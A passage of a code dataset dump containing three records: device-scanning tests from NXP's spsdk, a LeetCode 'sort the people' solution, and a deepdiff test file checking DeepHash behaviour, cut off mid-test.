True\n\n\nlist_port_info_mock = [\n ListPortInfo(device=\"COM1\"),\n ListPortInfo(device=\"COM5\"),\n ListPortInfo(device=\"COM28\"),\n]\n\n\n@patch(\"spsdk.utils.nxpdevscan.MbootUARTInterface.scan\", mock_mb_scan_uart)\n@patch(\"spsdk.utils.nxpdevscan.SDP.read_status\", mock_sdp_read_status)\n@patch(\"spsdk.utils.interfaces.device.serial_device.SerialDevice.__init__\", mock_sdp_uart_init)\n@patch(\"spsdk.utils.nxpdevscan.comports\", MagicMock(return_value=list_port_info_mock))\ndef test_uart_device_search():\n \"\"\"Test, that search method returns all NXP Uart devices.\"\"\"\n\n result = [\n devicedescription.UartDeviceDescription(name=\"COM1\", dev_type=\"mboot device\"),\n devicedescription.UartDeviceDescription(name=\"COM5\", dev_type=\"SDP device\"),\n ]\n\n devices = nds.search_nxp_uart_devices()\n\n assert len(devices) == len(result)\n\n for dev, res in zip(devices, result):\n assert str(dev) == str(res)\n\n\n# following mock functions are only for `test_sdio_device_search usage`\nclass mockSdio:\n def __init__(self, path: str = None) -> None:\n \"\"\"Initialize the SDIO interface object.\n\n :raises McuBootConnectionError: when the path is empty\n \"\"\"\n super().__init__()\n\n class SdioDevice:\n def __init__(self, _path) -> None:\n self._opened = False\n # Temporarily use hard code until there is a way to retrive VID/PID\n self.vid = 0x0471\n self.pid = 0x0209\n self.timeout = 2000\n if path is None:\n raise McuBootConnectionError(\"No SDIO device path\")\n self.path = _path\n self.is_blocking = False\n\n self.device = 
SdioDevice(path)\n\n\ndef test_sdio_device_search():\n    \"\"\"Test that the search method returns all NXP SDIO devices.\"\"\"\n\n    test = mockSdio(\"/dev/mcu-sdio\")\n    result = [\n        devicedescription.SDIODeviceDescription(0x0471, 0x0209, \"/dev/mcu-sdio\"),\n    ]\n    with patch(\"spsdk.utils.nxpdevscan.MbootSdioInterface.scan\", MagicMock(return_value=[test])):\n        devices = nds.search_nxp_sdio_devices()\n\n    assert len(devices) == len(result)\n\n    for dev, res in zip(devices, result):\n        assert str(dev) == str(res)\n\n\ndef test_sdio_device_search_no_device_found():\n    \"\"\"Test that the search returns nothing when no NXP SDIO device is found.\"\"\"\n\n    result = [\n        devicedescription.SDIODeviceDescription(0x0471, 0x0209, \"\"),\n    ]\n    with patch(\"spsdk.utils.nxpdevscan.MbootSdioInterface.scan\", MagicMock(return_value=[])):\n        devices = nds.search_nxp_sdio_devices()\n    assert len(devices) != len(result)\n\n\n@pytest.mark.parametrize(\n    \"vid, pid, expected_result\",\n    [\n        (0x1111, 0x2222, []),\n        (0x15A2, 0x0073, [\"MKL27\", \"MXRT20\", \"MXRT50\", \"MXRT60\"]),\n        (0x1FC9, 0x0135, [\"IMXRT\", \"MXRT60\"]),\n    ],\n)\ndef test_get_device_name(vid, pid, expected_result):\n    \"\"\"Verify the search works and returns the appropriate names based on VID/PID\"\"\"\n    assert devicedescription.get_usb_device_name(vid, pid) == expected_result\n\n\ndef test_path_conversion():\n    \"\"\"Verify that the path gets converted properly.\"\"\"\n    with patch(\"platform.system\", MagicMock(return_value=\"Windows\")):\n        win_path = (\n            b\"\\\\\\\\?\\\\hid#vid_1fc9&pid_0130#6&1625c75b&0&0000#{4d1e55b2-f16f-11cf-88cb-001111000030}\"\n        )\n        assert (\n            devicedescription.convert_usb_path(win_path)\n            == \"HID\\\\VID_1FC9&PID_0130\\\\6&1625C75B&0&0000\"\n        )\n\n    with patch(\"platform.system\", MagicMock(return_value=\"Linux\")):\n        linux_path = b\"000A:000B:00\"\n\n        assert devicedescription.convert_usb_path(linux_path) == \"10#11\"\n\n    with patch(\"platform.system\", MagicMock(return_value=\"Darwin\")):\n        mac_path = b\"IOService:/AppleACPIPlatformExpert/PCI0@0/AppleACPIPCI/XHC1@14/XHC1@14000000/HS02@14200000/SE Blank RT Family @14200000\"\n\n        assert (\n            devicedescription.convert_usb_path(mac_path)\n            == \"IOService:/AppleACPIPlatformExpert/PCI0@0/AppleACPIPCI/XHC1@14/XHC1@14000000/HS02@14200000/SE Blank RT Family @14200000\"\n        )\n\n\nPATH_BY_SYSTEM = {\n    \"win\": (b\"some_path\", \"SOME_PATH\", \"0a595daf\"),\n    \"linux\": (b\"000A:000B:00\", \"10#11\", \"6359be0f\"),\n    \"darwin\": (\n        b\"IOService:/AppleACPIPlatformExpert/PCI0@0/AppleACPIPCI/XHC1@14/XHC1@14000000/HS02@14200000/SE Blank RT Family @14200000\",\n        \"IOService:/AppleACPIPlatformExpert/PCI0@0/AppleACPIPCI/XHC1@14/XHC1@14000000/HS02@14200000/SE Blank RT Family @14200000\",\n        \"cafe5e92\",\n    ),\n}\n\n\ndef mock_libusbsio_GetDeviceInfo(self, dev: int):\n    \"\"\"MagicMock override function to return information.\"\"\"\n    assert dev == 0\n    sio_info = libusbsio.LIBUSBSIO.HIDAPI_DEVICE_INFO_T()\n    sio_info.vendor_id = 10\n    sio_info.product_id = 20\n    sio_info.product_string = \"my product\"\n    sio_info.manufacturer_string = \"manufacturer X\"\n    sio_info.serial_number = \"sio device\"\n    sio_info.interface_number = 5\n    sio_info.release_number = 125\n\n    system = platform.system()\n    if system == \"Windows\":\n        sio_info.path = PATH_BY_SYSTEM[\"win\"][0]\n    if system == \"Linux\":\n        sio_info.path = PATH_BY_SYSTEM[\"linux\"][0]\n    if system == \"Darwin\":\n        sio_info.path = PATH_BY_SYSTEM[\"darwin\"][0]\n\n    return sio_info\n\n\n@patch(\"libusbsio.LIBUSBSIO.GetNumPorts\", 
MagicMock(return_value=1))\n@patch(\"libusbsio.LIBUSBSIO.GetDeviceInfo\", mock_libusbsio_GetDeviceInfo)\ndef test_sio_device_search():\n    \"\"\"Test that the search method returns all NXP SIO devices.\"\"\"\n\n    def get_return(path):\n        return (\n            \"LIBUSBSIO - manufacturer X, my product\\n\"\n            \"Vendor ID: 0x000a\\n\"\n            \"Product ID: 0x0014\\n\"\n            f\"Path: {path[1]}\\n\"\n            f\"Path Hash: {path[2]}\\n\"\n            \"Serial number: sio device\\n\"\n            \"Interface number: 5\\n\"\n            \"Release number: 125\"\n        )\n\n    if platform.system() != \"Darwin\":\n        # Windows and Linux libraries cannot be loaded on a Mac with Apple Silicon\n        with patch(\"platform.system\", MagicMock(return_value=\"Windows\")):\n            devices = nds.search_libusbsio_devices()\n            assert len(devices) == 1\n            assert str(devices[0]) == get_return(PATH_BY_SYSTEM[\"win\"])\n\n        with patch(\"platform.system\", MagicMock(return_value=\"Linux\")):\n            devices = nds.search_libusbsio_devices()\n            assert len(devices) == 1\n            assert str(devices[0]) == get_return(PATH_BY_SYSTEM[\"linux\"])\n\n    with patch(\"platform.system\", MagicMock(return_value=\"Darwin\")):\n        devices = nds.search_libusbsio_devices()\n        assert len(devices) == 1\n        assert str(devices[0]) == get_return(PATH_BY_SYSTEM[\"darwin\"])\n\n\ndef mock_libusbsio_GetNumPorts(self, vidpids=None):\n    \"\"\"Mock that fails when trying to get the number of ports from LIBUSBSIO.\"\"\"\n    raise libusbsio.LIBUSBSIO_Exception(\"Test Fail\")\n\n\n@patch(\"libusbsio.LIBUSBSIO.GetNumPorts\", mock_libusbsio_GetNumPorts)\ndef test_sio_device_search_fail():\n    \"\"\"Test that the NXP SIO device search raises SPSDKError when LIBUSBSIO fails.\"\"\"\n    with pytest.raises(SPSDKError):\n        nds.search_libusbsio_devices()\n","repo_name":"nxp-mcuxpresso/spsdk","sub_path":"tests/utils/test_nxpdevscan.py","file_name":"test_nxpdevscan.py","file_ext":"py","file_size_in_byte":11684,"program_lang":"python","lang":"en","doc_type":"code","stars":37,"dataset":"github-code","pt":"52"} +{"seq_id":"22613919470","text":"class Solution:\n    def sortPeople(self, names: List[str], heights: List[int]) -> List[str]:\n        mapping = {}\n        for i in range(len(names)):\n            mapping[heights[i]] = names[i]\n\n        # Sort dictionary\n        # mapping = sorted(mapping.items(), reverse=True)\n        # res = []\n        # for _, people in mapping:\n        #     res.append(people)\n        # return res\n\n        # Another approach\n        heights = sorted(heights, reverse=True)\n        res = []\n        for height in heights:\n            res.append(mapping.get(height))\n        return res\n    ","repo_name":"abdifatahmohamad/Coding-Interview-Solutions","sub_path":"leetcode_solutions/2418-sort-the-people/2418-sort-the-people.py","file_name":"2418-sort-the-people.py","file_ext":"py","file_size_in_byte":582,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"33640557470","text":"#!/usr/bin/env python\nimport re\nimport pytest\nfrom pathlib import Path\nimport logging\nimport datetime\nfrom collections import namedtuple\nfrom functools import partial\nfrom enum import Enum\nfrom deepdiff import DeepHash\nfrom deepdiff.deephash import (\n    prepare_string_for_hashing, unprocessed,\n    UNPROCESSED_KEY, BoolObj, HASH_LOOKUP_ERR_MSG, combine_hashes_lists)\nfrom deepdiff.helper import pypy3, get_id, number_to_string, np, py_major_version, py_minor_version\nfrom tests import CustomClass2\n\nlogging.disable(logging.CRITICAL)\n\n\nclass ClassC:\n    class_attr = 0\n\n    def __init__(self, a, b=None):\n        self.a = a\n        self.b = b\n\n    def __str__(self):\n        return \"({}, {})\".format(self.a, self.b)\n\n    __repr__ = __str__\n\n\n# Only the prep part of 
DeepHash. We don't need to test the actual hash function.\nDeepHashPrep = partial(DeepHash, apply_hash=False)\n\n\ndef prep_str(obj, ignore_string_type_changes=True):\n return obj if ignore_string_type_changes else 'str:{}'.format(obj)\n\n\nclass TestDeepHash:\n\n def test_dictionary(self):\n\n obj = {1: 1}\n result = DeepHash(obj)\n assert set(result.keys()) == {1, get_id(obj)}\n\n def test_get_hash_by_obj_is_the_same_as_by_obj_get_id(self):\n a = \"a\"\n obj = {1: a}\n result = DeepHash(obj)\n assert result[a]\n\n def test_deephash_repr(self):\n obj = \"a\"\n result = DeepHash(obj)\n assert \"{'a': '980410da9522db17c3ab8743541f192a5ab27772a6154dbc7795ee909e653a5c'}\" == repr(result)\n\n def test_deephash_values(self):\n obj = \"a\"\n result = list(DeepHash(obj).values())\n assert ['980410da9522db17c3ab8743541f192a5ab27772a6154dbc7795ee909e653a5c'] == result\n\n def test_deephash_keys(self):\n obj = \"a\"\n result = list(DeepHash(obj).keys())\n assert [\"a\"] == result\n\n def test_deephash_items(self):\n obj = \"a\"\n result = list(DeepHash(obj).items())\n assert [('a', '980410da9522db17c3ab8743541f192a5ab27772a6154dbc7795ee909e653a5c')] == result\n\n def test_get_hash_by_obj_when_does_not_exist(self):\n a = \"a\"\n obj = {1: a}\n result = DeepHash(obj)\n with pytest.raises(KeyError):\n result[2]\n\n def test_datetime(self):\n now = datetime.datetime.now()\n a = b = now\n a_hash = DeepHash(a)\n b_hash = DeepHash(b)\n assert a_hash[a] == b_hash[b]\n\n def test_datetime_truncate(self):\n a = datetime.datetime(2020, 5, 17, 22, 15, 34, 913070)\n b = datetime.datetime(2020, 5, 17, 22, 15, 39, 296583)\n c = datetime.datetime(2020, 5, 17, 22, 15, 34, 500000)\n\n a_hash = DeepHash(a, truncate_datetime='minute')\n b_hash = DeepHash(b, truncate_datetime='minute')\n assert a_hash[a] == b_hash[b]\n\n a_hash = DeepHash(a, truncate_datetime='second')\n c_hash = DeepHash(c, truncate_datetime='second')\n assert a_hash[a] == c_hash[c]\n\n def test_get_reserved_keyword(self):\n hashes = {UNPROCESSED_KEY: 'full item', 'key1': ('item', 'count')}\n result = DeepHash._getitem(hashes, obj='key1')\n assert 'item' == result\n # For reserved keys, it should just grab the object instead of grabbing an item in the tuple object.\n result = DeepHash._getitem(hashes, obj=UNPROCESSED_KEY)\n assert 'full item' == result\n\n def test_get_key(self):\n hashes = {'key1': ('item', 'count')}\n result = DeepHash.get_key(hashes, key='key2', default='banana')\n assert 'banana' == result\n\n def test_list_of_sets(self):\n a = {1}\n b = {2}\n obj = [a, b]\n result = DeepHash(obj)\n expected_result = {1, 2, get_id(a), get_id(b), get_id(obj)}\n assert set(result.keys()) == expected_result\n\n def test_bad_attribute(self):\n class Bad:\n __slots__ = ['x', 'y']\n\n def __getattr__(self, key):\n raise AttributeError(\"Bad item\")\n\n def __str__(self):\n return \"Bad Object\"\n\n def __repr__(self):\n return \"\".format(id(self))\n\n t1 = Bad()\n\n result = DeepHash(t1)\n expected_result = {t1: unprocessed, UNPROCESSED_KEY: [t1]}\n assert expected_result == result\n\n def test_built_in_hash_not_sensitive_to_bytecode_vs_unicode(self):\n a = 'hello'\n b = b'hello'\n a_hash = DeepHash(a, ignore_string_type_changes=True)[a]\n b_hash = DeepHash(b, ignore_string_type_changes=True)[b]\n assert a_hash == b_hash\n\n def test_sha1_hash_not_sensitive_to_bytecode_vs_unicode(self):\n a = 'hello'\n b = b'hello'\n a_hash = DeepHash(a, ignore_string_type_changes=True, hasher=DeepHash.sha1hex)[a]\n b_hash = DeepHash(b, ignore_string_type_changes=True, 
hasher=DeepHash.sha1hex)[b]\n        assert a_hash == b_hash\n\n    def test_path(self):\n        a = Path('testdir')\n        b = Path('testdir2')\n        a_hash = DeepHash(a)[a]\n        b_hash = DeepHash(b)[b]\n        assert a_hash != b_hash\n\n    def test_re(self):\n        a = re.compile(\"asdf.?\")\n        a_hash = DeepHash(a)[a]\n        assert a_hash is not unprocessed\n\n\nclass TestDeepHashPrep:\n    \"\"\"DeepHashPrep Tests covering object serialization.\"\"\"\n\n    def test_prep_bool_vs_num1(self):\n        assert {BoolObj.TRUE: 'bool:true'} == DeepHashPrep(True)\n        assert {1: 'int:1'} == DeepHashPrep(1)\n\n    def test_prep_bool_vs_num2(self):\n        item1 = {\n            \"Value One\": True,\n            \"Value Two\": 1,\n        }\n        item2 = {\n            \"Value Two\": 1,\n            \"Value One\": True,\n        }\n        assert DeepHashPrep(item1)[item1] == DeepHashPrep(item2)[item2]\n\n    def test_prep_str(self):\n        obj = \"a\"\n        expected_result = {obj: prep_str(obj)}\n        result = DeepHashPrep(obj, ignore_string_type_changes=True)\n        assert expected_result == result\n        expected_result = {obj: prep_str(obj, ignore_string_type_changes=False)}\n        result = DeepHashPrep(obj, ignore_string_type_changes=False)\n        assert expected_result == result\n\n    def test_dictionary_key_type_change(self):\n        obj1 = {\"b\": 10}\n        obj2 = {b\"b\": 10}\n\n        result1 = DeepHashPrep(obj1, ignore_string_type_changes=True)\n        result2 = DeepHashPrep(obj2, ignore_string_type_changes=True)\n        assert result1[obj1] == result2[obj2]\n        assert result1[\"b\"] == result2[b\"b\"]\n\n    def test_number_type_change(self):\n        obj1 = 10\n        obj2 = 10.0\n\n        result1 = DeepHashPrep(obj1)\n        result2 = DeepHashPrep(obj2)\n        assert result1[obj1] != result2[obj2]\n\n        result1 = DeepHashPrep(obj1, ignore_numeric_type_changes=True)\n        result2 = DeepHashPrep(obj2, ignore_numeric_type_changes=True)\n        assert result1[obj1] == result2[obj2]\n\n    def test_prep_str_fail_if_deephash_leaks_results(self):\n        \"\"\"\n        This test fails if DeepHash receives a mutable copy of hashes,\n        which would mean each DeepHash init carries hashes over from\n        the previous init.\n        \"\"\"\n        obj1 = \"a\"\n        expected_result = {obj1: prep_str(obj1)}\n        result = DeepHashPrep(obj1, ignore_string_type_changes=True)\n        assert expected_result == result\n        obj2 = \"b\"\n        result = DeepHashPrep(obj2, ignore_string_type_changes=True)\n        assert obj1 not in result\n\n    def test_dict_in_dict(self):\n        obj2 = {2: 3}\n        obj = {'a': obj2}\n        result = DeepHashPrep(obj, ignore_string_type_changes=True)\n        assert 'a' in result\n        assert obj2 in result\n\n    def do_list_or_tuple(self, func, func_str):\n        string1 = \"a\"\n        obj = func([string1, 10, 20])\n        if func is list:\n            obj_id = get_id(obj)\n        else:\n            obj_id = obj\n        string1_prepped = prep_str(string1)\n        expected_result = {\n            10: 'int:10',\n            20: 'int:20',\n            string1: string1_prepped,\n            obj_id: '{}:{},int:10,int:20'.format(func_str, string1_prepped),\n        }\n        result = DeepHashPrep(obj, ignore_string_type_changes=True)\n        assert expected_result == result\n\n    def test_list_and_tuple(self):\n        for func, func_str in ((list, 'list'), (tuple, 'tuple')):\n            self.do_list_or_tuple(func, func_str)\n\n    def test_named_tuples(self):\n        # When running under pypy3, string interning is implemented differently,\n        # so the id of x inside the named tuple changes.\n        x = \"x\"\n        x_prep = prep_str(x)\n        Point = namedtuple('Point', [x])\n        obj = Point(x=11)\n        result = DeepHashPrep(obj, ignore_string_type_changes=True)\n        if pypy3:\n            assert result[obj] == \"ntPoint:{%s:int:11}\" % x\n        else:\n            expected_result = {\n                x: x_prep,\n                obj: \"ntPoint:{%s:int:11}\" % x,\n                11: 'int:11',\n            }\n            assert 
expected_result == result\n\n def test_hash_enum(self):\n class MyEnum(Enum):\n A = 1\n B = 2\n\n if (py_major_version, py_minor_version) >= (3, 11):\n assert DeepHashPrep(MyEnum.A)[MyEnum.A] == r'objMyEnum:{str:_name_:str:A;str:_sort_order_:int:0;str:_value_:int:1}'\n else:\n assert DeepHashPrep(MyEnum.A)[MyEnum.A] == r'objMyEnum:{str:_name_:str:A;str:_value_:int:1}'\n assert DeepHashPrep(MyEnum.A) == DeepHashPrep(MyEnum(1))\n assert DeepHashPrep(MyEnum.A) != DeepHashPrep(MyEnum.A.name)\n assert DeepHashPrep(MyEnum.A) != DeepHashPrep(MyEnum.A.value)\n assert DeepHashPrep(MyEnum.A) != DeepHashPrep(MyEnum.B)\n\n def test_dict_hash(self):\n string1 = \"a\"\n string1_prepped = prep_str(string1)\n key1 = \"key1\"\n key1_prepped = prep_str(key1)\n obj = {key1: string1, 1: 10, 2: 20}\n expected_result = {\n 1: 'int:1',\n 10: 'int:10',\n 2: 'int:2',\n 20: 'int:20',\n key1: key1_prepped,\n string1: string1_prepped,\n get_id(obj): 'dict:{{int:1:int:10;int:2:int:20;{}:{}}}'.format(key1, string1)\n }\n result = DeepHashPrep(obj, ignore_string_type_changes=True)\n assert expected_result == result\n\n def test_dict_in_list(self):\n string1 = \"a\"\n key1 = \"key1\"\n dict1 = {key1: string1, 1: 10, 2: 20}\n obj = [0, dict1]\n expected_result = {\n 0: 'int:0',\n 1: 'int:1',\n 10: 'int:10',\n 2: 'int:2',\n 20: 'int:20',\n key1: key1,\n string1: string1,\n get_id(dict1): 'dict:{int:1:int:10;int:2:int:20;%s:%s}' %\n (key1, string1),\n get_id(obj):\n 'list:dict:{int:1:int:10;int:2:int:20;%s:%s},int:0' %\n (key1, string1)\n }\n result = DeepHashPrep(obj, ignore_string_type_changes=True)\n assert expected_result == result\n\n def test_nested_lists_same_hash(self):\n t1 = [1, 2, [3, 4]]\n t2 = [[4, 3], 2, 1]\n t1_hash = DeepHashPrep(t1)\n t2_hash = DeepHashPrep(t2)\n\n assert t1_hash[get_id(t1)] == t2_hash[get_id(t2)]\n\n def test_nested_lists_same_hash2(self):\n t1 = [1, 2, [3, [4, 5]]]\n t2 = [[[5, 4], 3], 2, 1]\n t1_hash = DeepHashPrep(t1)\n t2_hash = DeepHashPrep(t2)\n\n assert t1_hash[get_id(t1)] == t2_hash[get_id(t2)]\n\n def test_nested_lists_same_hash3(self):\n t1 = [{1: [2, 3], 4: [5, [6, 7]]}]\n t2 = [{4: [[7, 6], 5], 1: [3, 2]}]\n t1_hash = DeepHashPrep(t1)\n t2_hash = DeepHashPrep(t2)\n\n assert t1_hash[get_id(t1)] == t2_hash[get_id(t2)]\n\n def test_nested_lists_in_dictionary_same_hash(self):\n t1 = [{\"c\": 4}, {\"c\": 3}]\n t2 = [{\"c\": 3}, {\"c\": 4}]\n t1_hash = DeepHashPrep(t1)\n t2_hash = DeepHashPrep(t2)\n\n assert t1_hash[get_id(t1)] == t2_hash[get_id(t2)]\n\n def test_same_sets_same_hash(self):\n t1 = {1, 3, 2}\n t2 = {2, 3, 1}\n t1_hash = DeepHashPrep(t1)\n t2_hash = DeepHashPrep(t2)\n\n assert t1_hash[get_id(t1)] == t2_hash[get_id(t2)]\n \n @pytest.mark.parametrize(\"list1, list2, ignore_iterable_order, is_equal\", [\n ([1, 2], [2, 1], False, False),\n ([1, 2], [2, 1], True, True),\n ([1, 2, 3], [1, 3, 2], False, False),\n ([1, [1, 2, 3]], [1, [3, 2, 1]], False, False),\n ([1, [1, 2, 3]], [1, [3, 2, 1]], True, True),\n ((1, 2), (2, 1), False, False),\n ((1, 2), (2, 1), True, True),\n ])\n def test_ignore_iterable_order(self, list1, list2, ignore_iterable_order, is_equal):\n list1_hash = DeepHash(list1, ignore_iterable_order=ignore_iterable_order)\n list2_hash = DeepHash(list2, ignore_iterable_order=ignore_iterable_order)\n \n assert is_equal == (list1_hash[list1] == list2_hash[list2])\n\n @pytest.mark.parametrize(\"t1, t2, significant_digits, number_format_notation, result\", [\n ({0.012, 0.98}, {0.013, 0.99}, 1, \"f\", 'set:float:0.0,float:1.0'),\n (100000, 100021, 3, \"e\", 
'int:1.000e+5'),\n ])\n def test_similar_significant_hash(self, t1, t2, significant_digits,\n number_format_notation, result):\n t1_hash = DeepHashPrep(t1, significant_digits=significant_digits,\n number_format_notation=number_format_notation)\n t2_hash = DeepHashPrep(t2, significant_digits=significant_digits,\n number_format_notation=number_format_notation)\n\n if result:\n assert result == t1_hash[t1] == t2_hash[t2]\n else:\n assert t1_hash[t1] != t2_hash[t2]\n\n def test_number_to_string_func(self):\n def custom_number_to_string(number, *args, **kwargs):\n number = 100 if number < 100 else number\n return number_to_string(number, *args, **kwargs)\n\n t1 = [10, 12, 100000]\n t2 = [50, 63, 100021]\n t1_hash = DeepHashPrep(t1, significant_digits=4, number_format_notation=\"e\",\n number_to_string_func=custom_number_to_string)\n t2_hash = DeepHashPrep(t2, significant_digits=4, number_format_notation=\"e\",\n number_to_string_func=custom_number_to_string)\n\n assert t1_hash[10] == t2_hash[50] == t1_hash[12] == t2_hash[63] != t1_hash[100000]\n\n def test_same_sets_in_lists_same_hash(self):\n t1 = [\"a\", {1, 3, 2}]\n t2 = [{2, 3, 1}, \"a\"]\n t1_hash = DeepHashPrep(t1)\n t2_hash = DeepHashPrep(t2)\n\n assert t1_hash[get_id(t1)] == t2_hash[get_id(t2)]\n\n def test_unknown_parameters(self):\n with pytest.raises(ValueError):\n DeepHashPrep(1, wrong_param=2)\n\n def test_bad_attribute_prep(self):\n class Bad:\n __slots__ = ['x', 'y']\n\n def __getattr__(self, key):\n raise AttributeError(\"Bad item\")\n\n def __str__(self):\n return \"Bad Object\"\n\n t1 = Bad()\n\n result = DeepHashPrep(t1)\n expected_result = {t1: unprocessed, UNPROCESSED_KEY: [t1]}\n assert expected_result == result\n\n class Burrito:\n bread = 'flour'\n\n def __init__(self):\n self.spicy = True\n\n class Taco:\n bread = 'flour'\n\n def __init__(self):\n self.spicy = True\n\n class ClassA:\n def __init__(self, x, y):\n self.x = x\n self.y = y\n\n class ClassB:\n def __init__(self, x, y):\n self.x = x\n self.y = y\n\n class ClassC(ClassB):\n pass\n\n obj_a = ClassA(1, 2)\n obj_b = ClassB(1, 2)\n obj_c = ClassC(1, 2)\n\n burrito = Burrito()\n taco = Taco()\n\n @pytest.mark.parametrize(\"t1, t2, ignore_type_in_groups, ignore_type_subclasses, is_qual\", [\n (taco, burrito, [], False, False),\n (taco, burrito, [(Taco, Burrito)], False, True),\n ([taco], [burrito], [(Taco, Burrito)], False, True),\n ([obj_a], [obj_c], [(ClassA, ClassB)], False, False),\n ([obj_a], [obj_c], [(ClassA, ClassB)], True, True),\n ([obj_b], [obj_c], [(ClassB, )], True, True),\n ])\n def test_objects_with_same_content(self, t1, t2, ignore_type_in_groups, ignore_type_subclasses, is_qual):\n\n t1_result = DeepHashPrep(t1, ignore_type_in_groups=ignore_type_in_groups,\n ignore_type_subclasses=ignore_type_subclasses)\n t2_result = DeepHashPrep(t2, ignore_type_in_groups=ignore_type_in_groups,\n ignore_type_subclasses=ignore_type_subclasses)\n assert is_qual == (t1_result[t1] == t2_result[t2])\n\n def test_custom_object(self):\n cc_a = CustomClass2(prop1=[\"a\"], prop2=[\"b\"])\n t1 = [cc_a, CustomClass2(prop1=[\"c\"], prop2=[\"d\"])]\n t1_result = DeepHashPrep(t1)\n expected = 'list:objCustomClass2:{str:prop1:list:str:a;str:prop2:list:str:b},objCustomClass2:{str:prop1:list:str:c;str:prop2:list:str:d}' # NOQA\n assert expected == t1_result[t1]\n\n def test_repetition_by_default_does_not_effect(self):\n list1 = [3, 4]\n list1_id = get_id(list1)\n a = [1, 2, list1]\n a_id = get_id(a)\n\n list2 = [4, 3, 3]\n list2_id = get_id(list2)\n b = [list2, 2, 1]\n b_id = 
get_id(b)\n\n hash_a = DeepHashPrep(a)\n hash_b = DeepHashPrep(b)\n\n assert hash_a[list1_id] == hash_b[list2_id]\n assert hash_a[a_id] == hash_b[b_id]\n\n def test_setting_repetition_off_unequal_hash(self):\n list1 = [3, 4]\n list1_id = get_id(list1)\n a = [1, 2, list1]\n a_id = get_id(a)\n\n list2 = [4, 3, 3]\n list2_id = get_id(list2)\n b = [list2, 2, 1]\n b_id = get_id(b)\n\n hash_a = DeepHashPrep(a, ignore_repetition=False)\n hash_b = DeepHashPrep(b, ignore_repetition=False)\n\n assert not hash_a[list1_id] == hash_b[list2_id]\n assert not hash_a[a_id] == hash_b[b_id]\n\n assert hash_a[list1_id].replace('3|1', '3|2') == hash_b[list2_id]\n\n def test_already_calculated_hash_wont_be_recalculated(self):\n hashes = (i for i in range(10))\n\n def hasher(obj):\n return str(next(hashes))\n obj = \"a\"\n expected_result = {obj: '0'}\n result = DeepHash(obj, hasher=hasher)\n assert expected_result == result\n\n # we simply feed the last result to DeepHash\n # So it can re-use the results.\n result2 = DeepHash(obj, hasher=hasher, hashes=result)\n # if hashes are not cached and re-used,\n # then the next time hasher runs, it returns\n # number 1 instead of 0.\n assert expected_result == result2\n\n result3 = DeepHash(obj, hasher=hasher)\n expected_result = {obj: '1'}\n assert expected_result == result3\n\n def test_skip_type(self):\n l1 = logging.getLogger(\"test\")\n obj = {\"log\": l1, 2: 1337}\n result = DeepHashPrep(obj, exclude_types={logging.Logger})\n assert get_id(l1) not in result\n\n def test_skip_type2(self):\n l1 = logging.getLogger(\"test\")\n result = DeepHashPrep(l1, exclude_types={logging.Logger})\n assert not result\n\n def test_prep_dic_with_loop(self):\n obj = {2: 1337}\n obj[1] = obj\n result = DeepHashPrep(obj)\n expected_result = {get_id(obj): 'dict:{int:2:int:1337}', 1: 'int:1', 2: 'int:2', 1337: 'int:1337'}\n assert expected_result == result\n\n def test_prep_iterable_with_loop(self):\n obj = [1]\n obj.append(obj)\n result = DeepHashPrep(obj)\n expected_result = {get_id(obj): 'list:int:1', 1: 'int:1'}\n assert expected_result == result\n\n def test_prep_iterable_with_excluded_type(self):\n l1 = logging.getLogger(\"test\")\n obj = [1, l1]\n result = DeepHashPrep(obj, exclude_types={logging.Logger})\n assert get_id(l1) not in result\n\n def test_skip_str_type_in_dict_on_list(self):\n dic1 = {1: \"a\"}\n t1 = [dic1]\n dic2 = {}\n t2 = [dic2]\n t1_hash = DeepHashPrep(t1, exclude_types=[str])\n t2_hash = DeepHashPrep(t2, exclude_types=[str])\n assert 1 in t1_hash\n assert t1_hash[dic1] == t2_hash[dic2]\n\n def test_skip_path_in_hash(self):\n dic1 = {1: \"a\"}\n t1 = [dic1, 2]\n dic2 = {}\n t2 = [dic2, 2]\n t1_hash = DeepHashPrep(t1, exclude_paths=['root[0]'])\n t2_hash = DeepHashPrep(t2, exclude_paths='root[0]')\n t2_hash_again = DeepHashPrep(t2, include_paths='1')\n assert 1 not in t1_hash\n assert 2 in t1_hash\n assert t1_hash[2] == t2_hash[2]\n assert t1_hash[2] == t2_hash_again[2]\n\n def test_skip_path2(self):\n\n obj10 = {'a': 1, 'b': 'f', 'e': \"1111\", 'foo': {'bar': 'baz'}}\n obj11 = {'c': 1, 'd': 'f', 'e': 'Cool'}\n\n obj20 = {'a': 1, 'b': 'f', 'e': 'Cool', 'foo': {'bar': 'baz2'}}\n obj21 = {'c': 1, 'd': 'f', 'e': \"2222\"}\n\n t1 = [obj10, obj11]\n t2 = [obj20, obj21]\n\n exclude_paths = [\"root[0]['e']\", \"root[1]['e']\", \"root[0]['foo']['bar']\"]\n\n t1_hash = DeepHashPrep(t1, exclude_paths=exclude_paths)\n t2_hash = DeepHashPrep(t2, exclude_paths=exclude_paths)\n assert t1_hash[t1] == t2_hash[t2]\n\n def test_hash_include_path_nested(self):\n\n obj10 = {'a': 1, 
'b': 'f', 'e': \"1111\", 'foo': {'bar': 'baz'}}\n obj11 = {'c': 1, 'd': 'f', 'e': 'Cool'}\n\n obj20 = {'a': 1, 'b': 'f', 'e': 'Cool', 'foo': {'bar': 'baz'}}\n obj21 = {'c': 1, 'd': 'f', 'e': \"2222\"}\n\n t1 = [obj10, obj11]\n t2 = [obj20, obj21]\n\n include_paths = [\"root[0]['foo']['bar']\"]\n\n t1_hash = DeepHashPrep(t1, include_paths=include_paths)\n t2_hash = DeepHashPrep(t2, include_paths=include_paths)\n assert t1_hash[t1] == t2_hash[t2]\n\n def test_skip_regex_path(self):\n dic1 = {1: \"a\"}\n t1 = [dic1, 2]\n exclude_re = re.compile(r'\\[0\\]')\n t1_hash = DeepHashPrep(t1, exclude_regex_paths=r'\\[0\\]')\n t2_hash = DeepHashPrep(t1, exclude_regex_paths=[exclude_re])\n assert 1 not in t1_hash\n assert 2 in t1_hash\n assert t1_hash[2] == t2_hash[2]\n\n def test_skip_hash_exclude_obj_callback(self):\n def exclude_obj_callback(obj, parent):\n return True if parent == \"root[0]['x']\" or obj == 2 else False\n\n dic1 = {\"x\": 1, \"y\": 2, \"z\": 3}\n t1 = [dic1]\n t1_hash = DeepHashPrep(t1, exclude_obj_callback=exclude_obj_callback)\n assert t1_hash == {'y': 'str:y', 'z': 'str:z', 3: 'int:3',\n get_id(dic1): 'dict:{str:z:int:3}', get_id(t1): 